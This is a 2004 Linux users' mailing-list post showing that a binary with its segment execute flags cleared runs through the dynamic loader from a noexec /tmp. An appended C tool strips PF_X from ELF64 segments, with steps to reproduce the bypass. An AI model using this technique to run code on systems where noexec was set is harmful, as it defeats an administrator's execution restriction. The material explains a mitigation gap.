> Paolo Alexis Falcone wrote:
>
>>Fortunately though you'd not encounter this if you're using a 2.6
>>kernel. This is what you'll see on a 2.6 kernel:
>>
>
> that's a relief. we're concerned about this exploit on the linux
> workstations we're going to deploy next month. good thing the kernel on
> those is 2.6 too.
>
>

Had some time to fiddle with this this morning. Looking into the kernel
sources you can see this snippet in linux/mm/mmap.c:
                if ((prot & PROT_EXEC) &&
                    (file->f_vfsmnt->mnt_flags & MNT_NOEXEC))
                        return -EPERM;
but as pointed out in discussions (forgot where) in early 2004, it can still
be bypassed using custom binaries with the execute flags removed from the
segments.

The kernel checks for executable segments in the binary, and if it doesn't
find any, PROT_EXEC doesn't get declared; voila, the above snippet is
circumvented by these special binaries. Unfortunately, the circumvention
works on 2.6 kernels.

(on 2.6.9-rc3, on /tmp mounted with the noexec flag)

[EMAIL PROTECTED] tmp $ ls -la *hello
-rwxr-xr-x  1 xedx users 6965 Oct 11 12:00 ordinaryhello
-rwxr-xr-x  1 xedx users 6965 Oct 11 11:58 specialhello
[EMAIL PROTECTED] tmp $ ./ordinaryhello
-bash: ./ordinaryhello: Permission denied
[EMAIL PROTECTED] tmp $ ./specialhello
-bash: ./specialhello: Permission denied
[EMAIL PROTECTED] tmp $ /lib/ld-linux.so.2 ./ordinaryhello
./ordinaryhello: error while loading shared libraries: ./ordinaryhello:
failed to map segment from shared object: Operation not permitted
[EMAIL PROTECTED] tmp $ /lib/ld-linux.so.2 ./specialhello
Greetings from ed
[EMAIL PROTECTED] tmp $

specialhello binary -> http://i.keepsilent.net/specialhello
ordinaryhello binary -> http://i.keepsilent.net/ordinaryhello
hello.c -> http://i.keepsilent.net/hello.c

sha1sums:
cd12f42e32c9c08b3217aadff511b561b05dadb4  specialhello
5182752ba19e1353b62c81d0db621ea0ca450ca8  ordinaryhello

--
ed [!] http://i.keepsilent.net(stale) [!] propolice[at]gmail[dot]com
Professor at the University of my Living Room Sofa
Senior Researcher of the Kitchen Refrigerator

--
Philippine Linux Users' Group (PLUG) Mailing List
[EMAIL PROTECTED] (#PLUG @ irc.free.net.ph)
Official Website: http://plug.linux.org.ph
Searchable Archives: http://marc.free.net.ph
.
To leave, go to http://lists.q-linux.com/mailman/listinfo/plug
.
Are you a Linux newbie? To join the newbie list, go to
http://lists.q-linux.com/mailman/listinfo/ph-linux-newbie
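Added example, not code from the post above or from the linked hello.c: a small C tool that does what the post attributes to specialhello. It walks the ELF64 program headers, counts the PT_LOAD segments carrying PF_X (the flag that makes ld.so request PROT_EXEC when it mmap()s the segment, which is the request the mm/mmap.c check rejects on a noexec mount), and can write a copy of the binary with PF_X cleared. Only little-endian ELF64 is handled, so the 32-bit ordinaryhello from the post would need the Elf32 structures; the in-memory sample image and the file names are constructed for this example.

```c
/* elf_noexec_probe.c: added example, not code from the original post.
 * Reports which PT_LOAD segments of a little-endian ELF64 image carry PF_X
 * (what ld.so maps with PROT_EXEC) and can write a copy with PF_X cleared. */
#include <elf.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Locate the program header table. Returns 0 on success, -1 if buf is not a
 * sane little-endian ELF64 image or the table lies outside the buffer. */
static int phdr_table(const unsigned char *buf, size_t len, size_t *off, int *num)
{
    Elf64_Ehdr eh;
    if (len < sizeof eh) return -1;
    memcpy(&eh, buf, sizeof eh);                  /* memcpy: buf may be unaligned */
    if (memcmp(eh.e_ident, ELFMAG, SELFMAG) != 0) return -1;
    if (eh.e_ident[EI_CLASS] != ELFCLASS64 || eh.e_ident[EI_DATA] != ELFDATA2LSB) return -1;
    if (eh.e_phentsize != sizeof(Elf64_Phdr)) return -1;
    if (eh.e_phoff > len || (size_t)eh.e_phnum * sizeof(Elf64_Phdr) > len - eh.e_phoff) return -1;
    *off = (size_t)eh.e_phoff;
    *num = eh.e_phnum;
    return 0;
}

/* Number of PT_LOAD segments with PF_X set; -1 on bad input. */
int count_exec_segments(const unsigned char *buf, size_t len)
{
    size_t off; int num, i, execs = 0;
    if (phdr_table(buf, len, &off, &num) != 0) return -1;
    for (i = 0; i < num; i++) {
        Elf64_Phdr ph;
        memcpy(&ph, buf + off + i * sizeof ph, sizeof ph);
        if (ph.p_type == PT_LOAD && (ph.p_flags & PF_X)) execs++;
    }
    return execs;
}

/* Clear PF_X on every PT_LOAD program header in place. The code bytes are
 * untouched; only the protection ld.so will ask for changes. Returns how
 * many flags were cleared, -1 on bad input. */
int strip_exec_flags(unsigned char *buf, size_t len)
{
    size_t off; int num, i, cleared = 0;
    if (phdr_table(buf, len, &off, &num) != 0) return -1;
    for (i = 0; i < num; i++) {
        Elf64_Phdr ph;
        unsigned char *p = buf + off + i * sizeof ph;
        memcpy(&ph, p, sizeof ph);
        if (ph.p_type == PT_LOAD && (ph.p_flags & PF_X)) {
            ph.p_flags &= ~(Elf64_Word)PF_X;
            memcpy(p, &ph, sizeof ph);
            cleared++;
        }
    }
    return cleared;
}

/* Constructed sample for offline testing: an ELF64 header plus two PT_LOAD
 * headers (R-X text, RW- data), no real code. Returns bytes written, 0 if cap is too small. */
size_t build_sample_elf(unsigned char *out, size_t cap)
{
    Elf64_Ehdr eh; Elf64_Phdr ph[2];
    size_t need = sizeof eh + sizeof ph;
    if (cap < need) return 0;
    memset(&eh, 0, sizeof eh); memset(ph, 0, sizeof ph);
    memcpy(eh.e_ident, ELFMAG, SELFMAG);
    eh.e_ident[EI_CLASS] = ELFCLASS64; eh.e_ident[EI_DATA] = ELFDATA2LSB; eh.e_ident[EI_VERSION] = EV_CURRENT;
    eh.e_type = ET_EXEC; eh.e_machine = EM_X86_64; eh.e_version = EV_CURRENT;
    eh.e_phoff = sizeof eh; eh.e_ehsize = sizeof eh; eh.e_phentsize = sizeof ph[0]; eh.e_phnum = 2;
    ph[0].p_type = PT_LOAD; ph[0].p_flags = PF_R | PF_X; ph[0].p_align = 0x1000;
    ph[1].p_type = PT_LOAD; ph[1].p_flags = PF_R | PF_W; ph[1].p_align = 0x1000;
    memcpy(out, &eh, sizeof eh); memcpy(out + sizeof eh, ph, sizeof ph);
    return need;
}

/* Round trip on the constructed sample: PF_X segment count before and after stripping. */
int sample_exec_count_before(void) { unsigned char img[256]; size_t n = build_sample_elf(img, sizeof img); return count_exec_segments(img, n); }
int sample_exec_count_after(void)  { unsigned char img[256]; size_t n = build_sample_elf(img, sizeof img); strip_exec_flags(img, n); return count_exec_segments(img, n); }

/* Usage: ./elf_noexec_probe in.elf [out.elf]  (file names are the caller's choice) */
int main(int argc, char **argv)
{
    FILE *f; unsigned char *buf; long len; int n;
    if (argc < 2) { fprintf(stderr, "usage: %s in.elf [out.elf]\n", argv[0]); return 2; }
    if (!(f = fopen(argv[1], "rb"))) { perror(argv[1]); return 1; }
    fseek(f, 0, SEEK_END); len = ftell(f); rewind(f);
    if (len <= 0 || !(buf = malloc((size_t)len)) || fread(buf, 1, (size_t)len, f) != (size_t)len) { perror("read"); return 1; }
    fclose(f);
    n = count_exec_segments(buf, (size_t)len);
    if (n < 0) { fprintf(stderr, "%s: not a little-endian ELF64 image\n", argv[1]); return 1; }
    printf("%s: %d PT_LOAD segment(s) with PF_X\n", argv[1], n);
    if (argc > 2) {
        n = strip_exec_flags(buf, (size_t)len);
        if (!(f = fopen(argv[2], "wb")) || fwrite(buf, 1, (size_t)len, f) != (size_t)len) { perror(argv[2]); return 1; }
        fclose(f);
        printf("%s: wrote copy with PF_X cleared on %d segment(s)\n", argv[2], n);
    }
    free(buf);
    return 0;
}
```

To reproduce the post's observation on a 64-bit box: compile a hello world, run `./elf_noexec_probe ./hello ./hello_noexec` on a noexec mount, then compare `/lib64/ld-linux-x86-64.so.2 ./hello` (fails with "failed to map segment", the EPERM from the mmap check quoted above) with the same command on `./hello_noexec` (the loader maps the text without PROT_EXEC, so the check never fires). Whether the stripped copy then actually runs depends on the CPU and kernel, not on the mount flag: a mapping without PROT_EXEC only executes where read implies execute (i386 without NX); on an NX-capable 64-bit kernel the same copy faults on its first instruction instead of printing the greeting.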
